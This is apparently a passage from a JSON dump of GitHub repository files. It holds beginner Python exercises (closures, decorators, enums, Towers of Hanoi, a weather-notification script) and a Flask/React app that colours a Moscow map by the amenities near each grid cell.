右侧-整数字符串转换\n r_transfer = reduce(lambda x, y: x * 10 + y, map(char2int, r_s_float))\n\n # 注意:\n # (1)、r_transfer / 10 ** r_s_len: expression python2 return 0\n # (1)、r_transfer / 10 ** r_s_len: expression python3 return 0.456\n return l_transfer + r_transfer / 10**r_s_len\n\nprint(str2float('123.456'))\nprint(type(str2float('123.456')))\n\n\ndef str2float(s):\n l_int, r_int = s.split('.')\n\n r_len = len(r_int)\n\n # 字符转数字函数\n def char2int(s):\n return {'0': 0,\n '1': 1,\n '2': 2,\n '3': 3,\n '4': 4,\n '5': 5,\n '6': 6,\n '7': 7,\n '8': 8,\n '9': 9}[s]\n\n l_tr = reduce(lambda x, y: x * 10 + y, map(char2int, l_int))\n\n r_tr = reduce(lambda x, y: x * 10 + y, map(char2int, r_int))\n\n return l_tr + r_tr / 10**r_len\n\n\nprint(str2float('1454654.1524814'))\n" }, { "alpha_fraction": 0.5569230914115906, "alphanum_fraction": 0.5907692313194275, "avg_line_length": 13.17391300201416, "blob_id": "1062dd5492e477d846c8caa50897435150d5811b", "content_id": "26f579a2c3411a5d266fd876a1b84445cf1f0f88", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 329, "license_type": "permissive", "max_line_length": 48, "num_lines": 23, "path": "/16enum.py", "repo_name": "zuosc/PythonCode", "src_encoding": "UTF-8", "text": "# _*_ coding:utf8 _*_\n# Power by zuosc\n# 枚举\n\nfrom enum import Enum,unique\n\n@unique\nclass Weekeday(Enum):\n Sun = 0\n Mon = 1\n Tue = 2\n Wed = 3\n Thu = 4\n Fri = 5\n Sat = 6\n\nday1 = Weekeday.Mon\nprint(day1.value)\n\nprint(Weekeday(1))\n\nfor name,member in Weekeday.__members__.items():\n print(name,'=>',member)" }, { "alpha_fraction": 0.553459107875824, "alphanum_fraction": 0.704402506351471, "avg_line_length": 18.75, "blob_id": "5bf2f834a10270bcf06be616534eb4e24ccbf8bf", "content_id": "9377cff486dadfa7e3e62013c2163910456a4d7d", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 165, "license_type": "permissive", "max_line_length": 37, "num_lines": 8, "path": "/14partialfunction.py", "repo_name": "zuosc/PythonCode", "src_encoding": "UTF-8", "text": "# _*_ coding:utf8 _*_\n# Power by zuosc 2016-10-16\n# Partial Function 偏函数\n\nimport functools\nint2 = functools.partial(int, base=2)\n\nprint(int2('101001010101'))\n\n" }, { "alpha_fraction": 0.4058956801891327, "alphanum_fraction": 0.4444444477558136, "avg_line_length": 11.970588684082031, "blob_id": "1a6186a5ad52e8a844c66a393bc7ec19e67c29ce", "content_id": "3ec8657ed59d2b4a8e0ed13366d054e39e5e41ff", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 976, "license_type": "permissive", "max_line_length": 43, "num_lines": 68, "path": "/12returnfun.py", "repo_name": "zuosc/PythonCode", "src_encoding": "UTF-8", "text": "# -*- coding:utf8 -*-\n# Power by zuosc\n# 返回函数\n\n\ndef calc_sum(*args):\n ax = 0\n for n in args:\n ax = ax + n\n return ax\n\n\ndef lazy_sum(*args):\n def sum():\n ax = 0\n for n in args:\n ax = ax + n\n return ax\n\n return sum\n\n\nf = lazy_sum(1, 3, 5, 7, 9)\nprint(f)\nprint(f())\n\nprint('-------------------------')\nf1 = lazy_sum(1, 3, 5, 7, 9)\nf2 = lazy_sum(1, 3, 5, 7, 9)\nprint(f1 == f2)\n\n# 闭包\n# 返回闭包时牢记的一点就是:返回函数不要引用任何循环变量,或者后续会发生变化的变量。\n\n\ndef count():\n fs = []\n for i in range(1, 4):\n\n def f():\n return i * i\n\n fs.append(f)\n return fs\n\n\nf1, f2, f3 = count()\n\nprint(f1())\n\nprint('-------------------')\n\n\ndef countnew():\n def f(j):\n def g():\n return j * j\n return g\n\n fs = []\n for i in range(1, 4):\n fs.append(f(i))\n return fs\n\n\nf4, f5, f6 = countnew()\n\nprint(f5())\n" }, { "alpha_fraction": 0.6526526808738708, "alphanum_fraction": 0.7227227091789246, "avg_line_length": 39, "blob_id": "e8fed654389443fed98330abe207fa779b6d4e24", "content_id": "6b8b8326c97a011ac02f937c11796882bb8b9ce5", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1041, "license_type": "permissive", "max_line_length": 261, "num_lines": 25, "path": "/Demo/xinzhiWeather.py", "repo_name": "zuosc/PythonCode", "src_encoding": "UTF-8", "text": "# -*- coding:utf-8 -*-\n# !/usr/bin/env python3\n# Power by zuosc\n\n\nimport json\nimport urllib.parse\nimport urllib.request\n\n\nweatherApiAdder = 'http://widget.thinkpage.cn/api/weather?flavor=slim&location=WX4FBXXFKE4F&geolocation=enabled&language=zh-chs&unit=c&theme=chameleon&container=weather-widget&bubble=enabled&alarmType=circle&uid=UE4B455F4F&hash=cfc949b4b932fff04040f9c9f776018b'\nresult = urllib.request.urlopen(weatherApiAdder).read()\njsonData = result.decode('utf8')\ndata = json.loads(jsonData)\n\ntitle = '今日天气'\ncontent ='今日天气:' + data[\"weather\"][\"now\"][\"text\"] \\\n + ' \\r\\n当前温度:' + data[\"weather\"][\"now\"][\"temperature\"]+'℃'\nif data[\"weather\"][\"alarms\"]:\n content = content + ' \\r\\n天气报警:' + data[\"weather\"][\"alarms\"][0][\"type\"] + data[\"weather\"][\"alarms\"][0][\"level\"] + '预警'\n\nsendurl='http://sc.ftqq.com/SCU5209T50ff781c69372d9b370387f5c079be01587ae52428055.send?'\nparams = {'text':title,'desp':content}\nparams = urllib.parse.urlencode(params)\nurllib.request.urlopen(sendurl+params)" }, { "alpha_fraction": 0.5353260636329651, "alphanum_fraction": 0.5625, "avg_line_length": 13.192307472229004, "blob_id": "ee04250b26921f9a57e7f7ab740339e5f830c262", "content_id": "30bb165a48af391e36bc79c24cae555dfa30f593", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 378, "license_type": "permissive", "max_line_length": 40, "num_lines": 26, "path": "/OOP/subclass.py", "repo_name": "zuosc/PythonCode", "src_encoding": "UTF-8", "text": "# !/usr/bin/env python3\n# _*_ coding:utf8 _*_\n# Power by zuosc 2016-10-23\n\n'subclass demo 继承和多态'\n\n\nclass Animal(object):\n def run(self):\n print('Animal is running......')\n\n\nclass Dog(Animal):\n def run(self):\n print('Dog is running.....')\n\n def eat(self):\n print('dog is eating......')\n\n\nclass Cat(Animal):\n pass\n\n\ndog = Dog()\ndog.run()" }, { "alpha_fraction": 0.5379061102867126, "alphanum_fraction": 0.5679903626441956, "avg_line_length": 16.3125, "blob_id": "601445afba24845f9ea30962e2fee2573ca3ce0b", "content_id": "630d090c6c024f67f4774f669ee0f0a45909129d", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 997, "license_type": "permissive", "max_line_length": 75, "num_lines": 48, "path": "/13decorator.py", "repo_name": "zuosc/PythonCode", "src_encoding": "UTF-8", "text": "# _*_ coding:utf8 _*_\n# Power by zuosc 2016-10-13\n# Decorator 装饰器\n\nimport functools\n\n\ndef log(func):\n @functools.wraps(func) # 解决依赖函数签名的代码,因为这里返回的函数名已经变为wrapper了,不是now了\n def wrapper(*args, **kw):\n print('call %s():' % func.__name__)\n return func(*args, **kw)\n\n return wrapper\n\n\n@log # 相当于 now = log(now)\ndef now():\n print('2016-10-17')\n\n\nprint(now())\n\nprint('----------------------')\n\n# 带参数的\n\nimport functools\n\n\ndef log(text):\n def decorator(func):\n @functools.wraps(func) # 解决依赖函数签名的代码,因为这里返回的函数名已经变为wrapper了,不是now了\n def wrapper(*args, **kw):\n print('%s %s():' % (text, func.__name__))\n return func(*args, **kw)\n\n return wrapper\n\n return decorator\n\n\n@log('记录日志,调试程序:') # 相当于 now = log('execute')(now)\ndef now():\n print('2016-10-17')\n\n\nprint(now())\n" }, { "alpha_fraction": 0.4032786786556244, "alphanum_fraction": 0.44590163230895996, "avg_line_length": 15.052631378173828, "blob_id": "83250bffdf231fc011b3c7fa9c01ebb987c73a9e", "content_id": "ffee9cb3e49c024d6b711652245eb145d39c2825", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 311, "license_type": "permissive", "max_line_length": 35, "num_lines": 19, "path": "/3hanoi.py", "repo_name": "zuosc/PythonCode", "src_encoding": "UTF-8", "text": "# -*- coding:utf8 -*-\n# Power by zuosc 2016-09-27\n# 汉诺塔\n\n\ndef move(S, E):\n print(S + '-------->' + E)\n\n\ndef hanoi(n, src, tmp, dst):\n if n == 1:\n move(src, dst)\n else:\n hanoi(n - 1, src, dst, tmp)\n move(src, dst)\n hanoi(n - 1, tmp, src, dst)\n\n\nhanoi(5, 'A', 'B', 'C')\n" }, { "alpha_fraction": 0.41473397612571716, "alphanum_fraction": 0.45839017629623413, "avg_line_length": 19.94285774230957, "blob_id": "0fe44ee9cb951261983d27b4dacdee38b59cc62e", "content_id": "2ae7b68ab8ff05ad4850921b1fafbee2df678d41", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 753, "license_type": "permissive", "max_line_length": 47, "num_lines": 35, "path": "/5iteration.py", "repo_name": "zuosc/PythonCode", "src_encoding": "UTF-8", "text": "# -*- coding:utf8 -*-\n# Power by zuosc 2016-10-01\n# 数据迭代\n\nd = {'a': 1, 'b': 2, 'c': 3} #d是字典 无序的\nfor key in d:\n print(key)\n\nprint('---------------------------')\nfor value in d.values():\n print(value)\n\nprint('----------------------------')\n\nfor item in d.items():\n print(item)\n\nprint('*********************')\nfor ch in 'ABC':\n print(ch)\n\nprint('--------------------------------------')\n\nfrom collections import Iterable\n\nprint(isinstance('abc', Iterable))\nprint(isinstance('[1,2,3,4]', Iterable))\nprint(isinstance(212312313, Iterable))\n\nprint('-----------------\\r\\n')\nfor i, value in enumerate(['A', 'B', 'C']):\n print(i + 1, value)\nprint('-----------------\\r\\n')\nfor x, y in [(1, 1), (2, 4), (3, 9)]:\n print(x, y)\n" } ]
28
br1tv4/vozvedenie-v-stepen
https://github.com/br1tv4/vozvedenie-v-stepen
c2f452727f673551bfbbc771e65c180db37e35f5
fec09854e652c6fc175be8dfed71cb77c376536f
d4e742404036f2a1e24b27ce3d61bcf451e532e1
refs/heads/main
2023-08-18T18:25:50.504757
2021-10-06T07:21:34
2021-10-06T07:21:34
414,109,522
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5157232880592346, "alphanum_fraction": 0.5220125913619995, "avg_line_length": 13.899999618530273, "blob_id": "13e3086d464c7c3cbb8d4b9c2a082e08ba2476ec", "content_id": "7b21836ee4d4ac841060b3aa6b03517ebf47eac7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 159, "license_type": "no_license", "max_line_length": 26, "num_lines": 10, "path": "/stepen-chisla.py", "repo_name": "br1tv4/vozvedenie-v-stepen", "src_encoding": "UTF-8", "text": "x = input(\"Input number \")\r\nn = input(\"Input degree \")\r\n\r\nx = int(x)\r\nn = int(n)\r\n\r\nresult = 1\r\nfor i in range (n):\r\n result *=x\r\nprint('x**n ==', result)\r\n" } ]
1
dimalemur/map
https://github.com/dimalemur/map
16e43739bdc9ce2c5518d92898971b32f987ad9d
eb95dac73c66ce68db68aaf30e7281a81daafc06
9faca907c95349a1f836020141586a03c8747f5a
refs/heads/master
2022-12-29T15:42:24.244673
2020-02-29T18:33:40
2020-02-29T18:33:40
225,604,917
0
0
null
2019-12-03T11:36:17
2020-02-29T18:33:56
2022-12-11T15:48:11
Python
[ { "alpha_fraction": 0.36116504669189453, "alphanum_fraction": 0.3786407709121704, "avg_line_length": 37.625, "blob_id": "f886c3baa7456a7660c7fcbe4fcab60545e3fb51", "content_id": "f33bb37977dbf59a57482f625c6ab7975a4d05c3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1545, "license_type": "no_license", "max_line_length": 120, "num_lines": 40, "path": "/src/server/app/main.py", "repo_name": "dimalemur/map", "src_encoding": "UTF-8", "text": "from module import *\nfrom analiz import for_life_2, for_sport, for_fun\nimport json\n\n\ndef for_api(mode):\n result = {\"type\": \"FeatureCollection\", \"features\": []}\n\n index = 0\n\n if mode == \"for_life\":\n md = for_life_2()\n if mode == \"for_sport\":\n md = for_sport()\n if mode == \"for_fun\":\n md = for_fun()\n\n for i in md:\n if i[\"color\"] != 0:\n result[\"features\"].append({\"type\": \"Feature\", \"id\": index, \"geometry\": {\"type\": \"Polygon\", \"coordinates\": [[\n [i[\"coordinates\"][0] - long / 2, i[\"coordinates\"][1] - width / 2],\n [i[\"coordinates\"][0] - long / 2, i[\"coordinates\"][1] + width / 2],\n [i[\"coordinates\"][0] + long / 2, i[\"coordinates\"][1] + width / 2],\n [i[\"coordinates\"][0] + long / 2, i[\"coordinates\"][1] - width / 2]\n ]\n ]\n },\n \"properties\": {\"fill\": i[\"color\"],\n \"fill-opacity\": 0.85,\n \"stroke\": i[\"color\"],\n \"stroke-width\": \"1\",\n \"stroke-opacity\": 0.9\n }})\n index += 1\n return result\n\n\ndef for_geo_json():\n with open(\"../Sample_GEOJSON.geojson\", \"w\") as write_file:\n json.dump(for_api(), write_file)\n" }, { "alpha_fraction": 0.6772486567497253, "alphanum_fraction": 0.7089946866035461, "avg_line_length": 14.833333015441895, "blob_id": "ec0ff68092eb1ed4a693f3a3a3c97cfd6bccabcb", "content_id": "299ffe49e6c717e7dc1cd41eb44f2ae0963cd2e4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Dockerfile", "length_bytes": 189, "license_type": "no_license", "max_line_length": 40, "num_lines": 12, "path": "/Dockerfile", "repo_name": "dimalemur/map", "src_encoding": "UTF-8", "text": "FROM python:3.7\n\nRUN mkdir -p /usr/src/app/\nWORKDIR /usr/src/app/\n\nCOPY . /usr/src/app/\nRUN pip install requests\nRUN pip install flask\n\nEXPOSE 5000\n\nCMD [\"python\" , \"src/server/app/app.py\"]" }, { "alpha_fraction": 0.5391804575920105, "alphanum_fraction": 0.5542774796485901, "avg_line_length": 21.079364776611328, "blob_id": "d85983a255b85925d6c57a4a5856ae5ccf03eea6", "content_id": "d7dada8e877601c3426f7f8ca44f5f129a18765b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1391, "license_type": "no_license", "max_line_length": 108, "num_lines": 63, "path": "/src/server/app/db.py", "repo_name": "dimalemur/map", "src_encoding": "UTF-8", "text": "import sqlite3\nimport sys\nimport os.path\n\nBASE_DIR = os.path.dirname(os.path.abspath(__file__))\ndb_path = os.path.join(BASE_DIR, \"bd.db\")\nprint(BASE_DIR)\nprint(db_path)\n\n\ndef tags(id):\n con = sqlite3.connect(db_path)\n cur = con.cursor()\n tags = []\n cur.execute('select * from tags')\n for j in cur.fetchall():\n if j[0] == id:\n tags.append({\"color\": j[1], \"text\": j[2]})\n return tags\n\n\ndef points(id):\n con = sqlite3.connect(db_path)\n cur = con.cursor()\n cur.execute('select * from points')\n for j in cur.fetchall():\n if j[0] == id:\n return j[1]\n\n\ndef initState():\n links = []\n con = sqlite3.connect(db_path)\n cur = con.cursor()\n\n state = []\n\n cur.execute('select * from options')\n for i in cur.fetchall():\n state.append({\"buttonName\": i[1], \"buttonStatus\": i[2], \"tags\": tags(i[0]), \"points\": points(i[0])})\n con.close()\n return state\n\n\ndef initState_api(mode):\n links = []\n con = sqlite3.connect(db_path)\n cur = con.cursor()\n\n state = []\n if mode == \"for_life\":\n md = 0\n if mode == \"for_fun\":\n md = 1\n if mode == \"for_sport\":\n md = 2\n\n cur.execute('select * from options')\n\n for i in cur.fetchall():\n state.append({\"buttonName\": i[1], \"buttonStatus\": i[2], \"tags\": tags(i[0]), \"points\": points(i[0])})\n con.close()\n return state[md]\n" }, { "alpha_fraction": 0.7858880758285522, "alphanum_fraction": 0.7858880758285522, "avg_line_length": 33.08333206176758, "blob_id": "61057ce2895437ce3ce780f85433b2cad9e01332", "content_id": "39ccdc24a04ed9d009ff81c23fdf2578568c29a5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 411, "license_type": "no_license", "max_line_length": 85, "num_lines": 12, "path": "/src/client/store/store.js", "repo_name": "dimalemur/map", "src_encoding": "UTF-8", "text": "import React from \"react\";\nimport {combineReducers, createStore,applyMiddleware} from \"redux\";\nimport {mainPageReducer} from \"./reducers/mainPageReducer.js\";\nimport thunk from \"redux-thunk\";\nimport {composeWithDevTools} from \"redux-devtools-extension\";\n\nlet reducers = combineReducers({\n MainPage: mainPageReducer\n});\n\n\nexport let store = createStore(reducers,composeWithDevTools(applyMiddleware(thunk)));\n\n\n" }, { "alpha_fraction": 0.5949820876121521, "alphanum_fraction": 0.6075268983840942, "avg_line_length": 22.29166603088379, "blob_id": "95adc4bbc12947a5d00e5414182e75fd08a9a01e", "content_id": "287b1daa2c6ab475b48a55264d6eea8f56bf18a6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 558, "license_type": "no_license", "max_line_length": 71, "num_lines": 24, "path": "/src/client/components/mapFrame/index.jsx", "repo_name": "dimalemur/map", "src_encoding": "UTF-8", "text": "import React from 'react';\nimport \"./mapFrame.css\"\nimport {connect} from \"react-redux\";\nimport {Map, ObjectManager, Placemark, YMaps} from \"react-yandex-maps\";\n\n\nconst MapFrame = (props) => {\n return (\n <div className=\"MapFrame Content\" id=\"maps\">\n <iframe\n src={props.options[props.active].points}\n width=\"100%\" height=\"100%\" frameBorder=\"0\"/>\n </div>\n )\n};\n\n\nexport default connect(\n state => ({\n options: state.MainPage.options,\n active: state.MainPage.active\n }),\n dispatch => ({})\n)(MapFrame);" }, { "alpha_fraction": 0.5767045617103577, "alphanum_fraction": 0.5795454382896423, "avg_line_length": 23.275861740112305, "blob_id": "b509f23753dec67330d92626b4178e29aa3d5f42", "content_id": "1f151c29a5684510f440780596cd84d60797d720", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 704, "license_type": "no_license", "max_line_length": 69, "num_lines": 29, "path": "/src/client/pages/main/index.jsx", "repo_name": "dimalemur/map", "src_encoding": "UTF-8", "text": "import React from 'react';\nimport {Header} from \"../../components/header\";\nimport OptionSelection from \"../../components/optionSelection\";\nimport {AsideWhiteBlock} from \"../../components/asideWhiteBlock\";\nimport {connect} from \"react-redux\";\nimport Places from \"../../components/places\";\n\n\nconst Main = (props) => {\n return (\n <div className=\"Main\">\n <Header/>\n <AsideWhiteBlock text = {props.state.MainPage.text[0]} />\n <AsideWhiteBlock text = {props.state.MainPage.text[1]}/>\n <OptionSelection />\n <Places/>\n </div>\n )\n};\n\n\nexport default connect(\n state =>({\n state:state\n }),\n dispatch => ({\n\n })\n)(Main);\n" }, { "alpha_fraction": 0.5748351216316223, "alphanum_fraction": 0.5854895710945129, "avg_line_length": 27.157142639160156, "blob_id": "0d6d88f223d2b5ad4a7946cbb36062177055f71f", "content_id": "49128fdf88ad9fac8bea4521eee27f7a35121639", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1971, "license_type": "no_license", "max_line_length": 118, "num_lines": 70, "path": "/src/server/app/app.py", "repo_name": "dimalemur/map", "src_encoding": "UTF-8", "text": "from flask import Flask, render_template\nfrom flask import request\nimport os\nfrom db import initState, initState_api\nfrom main import *\n\napp = Flask(__name__, static_folder=\"../../../public/\")\n\n\[email protected]('/')\ndef main():\n return render_template('index.html')\n\n\[email protected]('/ololo', methods=['GET', 'POST'])\ndef get_point():\n if request.method == 'POST':\n req_data = json.loads(request.data.decode(\"utf-8\"))\n print(req_data)\n res = json.dumps(for_life())\n print(res)\n return res\n else:\n return {\"lol\": \"1\"}\n\n\[email protected]('/initPlaces', methods=['GET', 'POST'])\ndef init_places():\n if request.method == 'POST':\n res = []\n req_data = json.loads(request.data.decode(\"utf-8\"))\n print(req_data)\n response = json.loads(requests.get(\"https://kudago.com/public-api/v1.2/places/?location=msk\").text)[\"results\"]\n for i in response:\n res.append({\"title\": i[\"title\"], \"telNumber\": i[\"phone\"], \"address\": i[\"address\"], \"link\": i[\"site_url\"]})\n return json.dumps(res)\n else:\n return {\"1\": \"1\"}\n\n\[email protected]('/init', methods=['GET', 'POST'])\ndef init_options():\n if request.method == 'POST':\n req_data = json.loads(request.data.decode(\"utf-8\"))\n print(req_data)\n res = json.dumps(initState())\n print(initState())\n return res\n else:\n return {\"1\": \"1\"}\n\n\[email protected]('/api/city=<city>&mode=<mode>', methods=['GET'])\ndef get_task(city, mode):\n if city != \"msk\":\n return render_template(\"404.html\", err=city)\n res = for_api(mode)\n return str(json.dumps(res))\n\n\[email protected]('/api/frame/city=<city>&mode=<mode>', methods=['GET'])\ndef get_init_state_api(city, mode):\n if city != \"msk\":\n return render_template(\"404.html\", err=city)\n res = initState_api(mode)\n return str(json.dumps(res)).encode('utf-8').decode('unicode-escape')\n\n\nif __name__ == '__main__':\n app.run(debug=True, host=\"0.0.0.0\")\n" }, { "alpha_fraction": 0.48640915751457214, "alphanum_fraction": 0.4892703890800476, "avg_line_length": 29.30434799194336, "blob_id": "bcc29cfbcecd5dea778dfa18ce5d3e84b36fb41f", "content_id": "7ca84c8ad06d7e25d00a6e767a3a328ff04b7557", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 699, "license_type": "no_license", "max_line_length": 55, "num_lines": 23, "path": "/src/client/store/reducers/Points.js", "repo_name": "dimalemur/map", "src_encoding": "UTF-8", "text": "import {addPoints} from \"../reducers/mainPageReducer\"\nimport {selectActive} from \"./mainPageReducer\";\n\nexport const asyncGetPoints = (index) => dispatch => {\n fetch('/ololo', {\n method: 'POST',\n body: JSON.stringify({val: index}),\n })\n .then((response) => response.json())\n .then((data) => {\n let result = data.map((point) => {\n return {\n latitude: point[\"coordinates\"][1],\n longitude: point[\"coordinates\"][0],\n color: point[\"color\"]\n }\n });\n\n dispatch(addPoints(result,index));\n\n })\n .catch((error) => console.error(error));\n};\n\n\n" }, { "alpha_fraction": 0.5004677176475525, "alphanum_fraction": 0.5014031529426575, "avg_line_length": 24.4761905670166, "blob_id": "e95c7d4d561af1bf07c5522ed080e82a423c8b8b", "content_id": "9b1731880676efab5dcaa29d7cf171bdcb308994", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 1069, "license_type": "no_license", "max_line_length": 87, "num_lines": 42, "path": "/src/client/components/selectDistrict/index.jsx", "repo_name": "dimalemur/map", "src_encoding": "UTF-8", "text": "import React, {useState} from 'react';\nimport \"./selectDistrict.css\"\nimport {InfoForDistrict} from \"../infoForDistrict\";\nimport {connect} from \"react-redux\";\n\n\nconst SelectDistrict = (props) => {\n\n const [active, setActive] = useState(0);\n\n const changeDistrict = (event) => {\n setActive(event.target.value);\n };\n\n return (\n <div className=\"SelectDistrict Content\">\n <select className=\"SelectDistrict-Select Select\" onChange={changeDistrict}>\n {\n props.districts.map((dst, i) => {\n return (\n <option className=\"SelectDistrict-Item\" key={i} value={i}>\n {dst.dist}\n </option>\n )\n })\n }\n </select>\n\n <InfoForDistrict districts={props.districts[active]}/>\n\n\n </div>\n )\n};\n\n\nexport default connect(\n state => ({\n districts: state.MainPage.districts\n }),\n dispatch => ({})\n)(SelectDistrict);" }, { "alpha_fraction": 0.4726298749446869, "alphanum_fraction": 0.5108315944671631, "avg_line_length": 35.38135528564453, "blob_id": "6d9f31bc3fceb3fc4e552b907bd06ffae504afaa", "content_id": "e72b6f28f88cf94fdd4bda3af3d186af2fde737e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4518, "license_type": "no_license", "max_line_length": 108, "num_lines": 118, "path": "/src/server/app/analiz.py", "repo_name": "dimalemur/map", "src_encoding": "UTF-8", "text": "from module import *\n\ncheck = []\npoints = map_point()\n\n\ndef calc_sum_2(points, text, good):\n search_points = fetch(text)\n for sP in search_points:\n for point in points:\n if point[\"coordinates\"][1] - long < sP[\"coordinates\"][1] < point[\"coordinates\"][1] + long:\n if point[\"coordinates\"][0] - width < sP[\"coordinates\"][0] < point[\"coordinates\"][0] + width:\n if sP[\"coordinates\"] not in check:\n check.append(sP[\"coordinates\"])\n if point[\"sum\"] != \"good\" and point[\"sum\"] < good:\n point[\"sum\"] += 1\n if point[\"sum\"] == \"good\" or point[\"sum\"] >= good:\n point[\"sum\"] = \"good\"\n return points\n\n\ndef for_life_2():\n points = map_point()\n points = calc_sum_2(points, \"Продуктовый магазин\", 4)\n points = calc_sum_2(points, \"Школа\", 1)\n points = calc_sum_2(points, \"Детский сад\", 1)\n points = calc_sum_2(points, \"Аптека\", 3)\n points = calc_sum_2(points, \"Парикмахерская\", 2)\n points = calc_sum_2(points, \"ТЦ\", 1)\n points = calc_sum_2(points, \"Поликлиника\", 2)\n points = calc_sum_2(points, \"ветеринарная клиника\", 1)\n points = calc_sum_2(points, \"Фитнес клуб\", 1)\n points = calc_sum_2(points, \"Почта\", 1)\n\n points_2 = map_point()\n points_2 = calc_sum_2(points_2, \"Бар\", 1)\n points_2 = calc_sum_2(points_2, \"кафе\", 1)\n points_2 = calc_sum_2(points_2, \"кинотеатр\", 1)\n points_2 = calc_sum_2(points_2, \"метро\", 2)\n\n for point in points:\n if point[\"sum\"] == \"good\":\n point[\"color\"] = \"#eeff00\"\n elif point[\"sum\"] != \"good\" and point[\"sum\"] != 0:\n point[\"color\"] = \"#c4c4c4\"\n else:\n point[\"color\"] = 0\n for point_2 in points_2:\n if point[\"coordinates\"] == point_2[\"coordinates\"]:\n if point_2[\"sum\"] == \"good\" and point[\"sum\"] == \"good\":\n point[\"color\"] = \"#ed8e09\"\n return points\n\n\ndef for_sport():\n points = map_point()\n points = calc_sum_2(points, \"Спортивная площадка\", 2)\n points = calc_sum_2(points, \"Фитнес Центр\", 1)\n points = calc_sum_2(points, \"Спортивный зал\", 1)\n\n points_2 = map_point()\n points_2 = calc_sum_2(points_2, \"Велодорожка\", 1)\n points_2 = calc_sum_2(points_2, \"Парк\", 1)\n\n for point in points:\n if point[\"sum\"] == \"good\":\n point[\"color\"] = \"#BF9DC5\"\n elif point[\"sum\"] != \"good\" and point[\"sum\"] != 0:\n point[\"color\"] = \"#c4c4c4\"\n else:\n point[\"color\"] = 0\n for point_2 in points_2:\n if point[\"coordinates\"] == point_2[\"coordinates\"]:\n if point_2[\"sum\"] == \"good\" and point[\"sum\"] == \"good\":\n point[\"color\"] = \"#7ABD9B\"\n return points\n\n\ndef for_fun():\n points = map_point()\n points = calc_sum_2(points, \"ночной клуб\", 1)\n points = calc_sum_2(points, \"Бар\", 2)\n points = calc_sum_2(points, \"кинотеатр\", 1)\n points = calc_sum_2(points, \"Кафе\", 3)\n points = calc_sum_2(points, \"бильярд\", 1)\n points = calc_sum_2(points, \"боулинг\", 1)\n points = calc_sum_2(points, \"квеструм\", 1)\n\n\n points_2 = map_point()\n points_2 = calc_sum_2(points_2, \"Театр\", 1)\n points_2 = calc_sum_2(points_2, \"Музей\", 1)\n\n for point_2 in points_2:\n if point_2[\"sum\"] == \"good\":\n point_2[\"color\"] = \"#FF3C1E\"\n elif point_2[\"sum\"] != \"good\" and point_2[\"sum\"] != 0:\n point_2[\"color\"] = \"#c4c4c4\"\n else:\n point_2[\"color\"] = 0\n\n for point in points:\n if point[\"sum\"] == \"good\":\n point[\"color\"] = \"#4574B2\"\n elif point[\"sum\"] != \"good\" and point[\"sum\"] != 0:\n point[\"color\"] = \"#c4c4c4\"\n else:\n point[\"color\"] = 0\n for point_2 in points_2:\n if point[\"coordinates\"] == point_2[\"coordinates\"]:\n if point_2[\"sum\"] == \"good\" and point[\"sum\"] == \"good\":\n point[\"color\"] = \"#BF9DC5\"\n if point_2[\"color\"] == \"#FF3C1E\" and point[\"color\"] == \"#c4c4c4\":\n point[\"color\"] = \"#FF3C1E\"\n if point_2[\"color\"] == \"#c4c4c4\" and point[\"color\"] == \"#4574B2\":\n point[\"color\"] = \"#4574B2\"\n\n return points\n" }, { "alpha_fraction": 0.32594937086105347, "alphanum_fraction": 0.32594937086105347, "avg_line_length": 26.521739959716797, "blob_id": "735d62092b8dcb158d2873285a94ea2ab77ba031", "content_id": "ab96f669c5cf2cf898516937fad3a42eed78e683", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 632, "license_type": "no_license", "max_line_length": 91, "num_lines": 23, "path": "/src/client/components/tags/index.jsx", "repo_name": "dimalemur/map", "src_encoding": "UTF-8", "text": "import React from 'react';\nimport \"./tags.css\"\n\n\nexport const Tags = (props) => {\n return (\n <div className=\"Tags\">\n\n {props.tags.map((tag,i) => {\n return (\n <div className=\"Item Tags-Item\" key={i}>\n <div className=\"Item-Lst\" style={{background: `${tag.color}`}}>\n </div>\n <div className=\"Item-Text\">\n {tag.text}\n </div>\n </div>\n )\n }\n )}\n </div>\n )\n};" }, { "alpha_fraction": 0.4517543911933899, "alphanum_fraction": 0.4517543911933899, "avg_line_length": 24.33333396911621, "blob_id": "f9d82320d40cfa2520dd6e4e6c22c1be81bcc698", "content_id": "4db9176797f3a92385b19cebe58f69141e808e97", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 1140, "license_type": "no_license", "max_line_length": 89, "num_lines": 45, "path": "/src/client/components/optionSelection/index.jsx", "repo_name": "dimalemur/map", "src_encoding": "UTF-8", "text": "import React from 'react';\nimport \"./optionSection.css\"\nimport MapFrame from \"../mapFrame\";\nimport {Tags} from \"../tags\";\nimport {connect} from \"react-redux\";\nimport Button from \"../button\"\n\nconst OptionSelection = (props) => {\n\n return (\n <div 